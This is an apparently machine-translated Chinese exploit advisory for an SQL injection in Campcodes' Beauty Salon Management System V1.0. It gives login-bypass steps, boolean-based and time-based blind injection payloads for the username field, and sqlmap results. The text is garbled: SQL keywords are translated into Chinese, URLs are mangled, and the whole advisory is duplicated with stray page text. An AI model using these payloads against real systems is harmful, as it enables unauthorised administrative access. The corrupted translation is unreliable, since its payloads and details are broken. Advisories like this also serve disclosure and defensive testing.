#利用标题:美容院管理系统V1.0 -SQLI
#找到的日期: 04/07/2023
#利用作者: FATIH NACAR
#版本: V1.0
#测试在: Windows 10
#供应商homepage3360 https://www.campcodes.com 3https://www.campcodes.com/projects/projects/retro-cellphone-online-online-store-anline-an-e-an-e-commerce-commerce-project-in-project-in-php-php-php-mysqli/
#软件link: https://www.campcodes.com/projects/beauty-salon-management-system-system-in-php-and-mysqli/
#CWE: CWE-89
脆弱性描述-
由Campcodes开发的美容沙龙管理系统: V1.0
发现容易受到SQL注入(SQLI)攻击的影响。这个脆弱性
允许攻击者使用SQL查询操纵登录身份验证
和旁路身份验证。该系统无法正确验证
登录期间,用户供以用户名和密码字段中的输入
流程,使攻击者能够注入恶意SQL代码。通过利用
这种漏洞,攻击者可以绕过身份验证并获得
未经授权访问系统。
繁殖的步骤-
以下步骤概述了SQL注入的开发
美容沙龙管理系统中的脆弱性v1.0:
1。通过访问URL:打开管理登录页面
2。在用户名和密码字段中,插入以下SQL注入
有效载荷显示在括号内,以绕过usename的身份验证
参数:
{payload:用户名=admin'and 6374=(select(case(6374=6374),然后6374
else(选择6483联合选择1671)) - vqbhpassword=testlogin=sign
在}
3.执行SQL注入有效载荷。
由于成功剥削,攻击者获得了未经授权的攻击
访问该系统,并使用管理特权登录。
SQLMAP结果:
发布参数“用户名”很脆弱。您想继续测试吗
其他人(如果有)? [是/n] y
SQLMAP确定了以下注射点,总计793
http(s)请求:
---
参数:用户名(帖子)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload:用户名=admin'and 6374=(select(case(6374=6374),然后6374
else(选择6483联合选择1671)) - vqbhpassword=testlogin=sign
在
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:用户名=admin'和(从(select(sleep(5)))qzvk中选择1468) -
rvyfpassword=testLogin=登录
---
[15:58:56] [INFO]后端DBMS是MySQL
Web Application Technology: PHP 8.2.4,Apache 2.4.56
后端DBMS: mySQL=5.0.12(Mariadb Fork)
#找到的日期: 04/07/2023
#利用作者: FATIH NACAR
#版本: V1.0
#测试在: Windows 10
#供应商homepage3360 https://www.campcodes.com 3https://www.campcodes.com/projects/projects/retro-cellphone-online-online-store-anline-an-e-an-e-commerce-commerce-project-in-project-in-php-php-php-mysqli/
#软件link: https://www.campcodes.com/projects/beauty-salon-management-system-system-in-php-and-mysqli/
#CWE: CWE-89
脆弱性描述-
由Campcodes开发的美容沙龙管理系统: V1.0
发现容易受到SQL注入(SQLI)攻击的影响。这个脆弱性
允许攻击者使用SQL查询操纵登录身份验证
和旁路身份验证。该系统无法正确验证
登录期间,用户供以用户名和密码字段中的输入
流程,使攻击者能够注入恶意SQL代码。通过利用
这种漏洞,攻击者可以绕过身份验证并获得
未经授权访问系统。
繁殖的步骤-
以下步骤概述了SQL注入的开发
美容沙龙管理系统中的脆弱性v1.0:
1。通过访问URL:打开管理登录页面
正在加载...
localhost
有效载荷显示在括号内,以绕过usename的身份验证
参数:
{payload:用户名=admin'and 6374=(select(case(6374=6374),然后6374
else(选择6483联合选择1671)) - vqbhpassword=testlogin=sign
在}
3.执行SQL注入有效载荷。
由于成功剥削,攻击者获得了未经授权的攻击
访问该系统,并使用管理特权登录。
SQLMAP结果:
发布参数“用户名”很脆弱。您想继续测试吗
其他人(如果有)? [是/n] y
SQLMAP确定了以下注射点,总计793
http(s)请求:
---
参数:用户名(帖子)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句(子查询- 评论)
payload:用户名=admin'and 6374=(select(case(6374=6374),然后6374
else(选择6483联合选择1671)) - vqbhpassword=testlogin=sign
在
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:用户名=admin'和(从(select(sleep(5)))qzvk中选择1468) -
rvyfpassword=testLogin=登录
---
[15:58:56] [INFO]后端DBMS是MySQL
Web Application Technology: PHP 8.2.4,Apache 2.4.56
后端DBMS: mySQL=5.0.12(Mariadb Fork)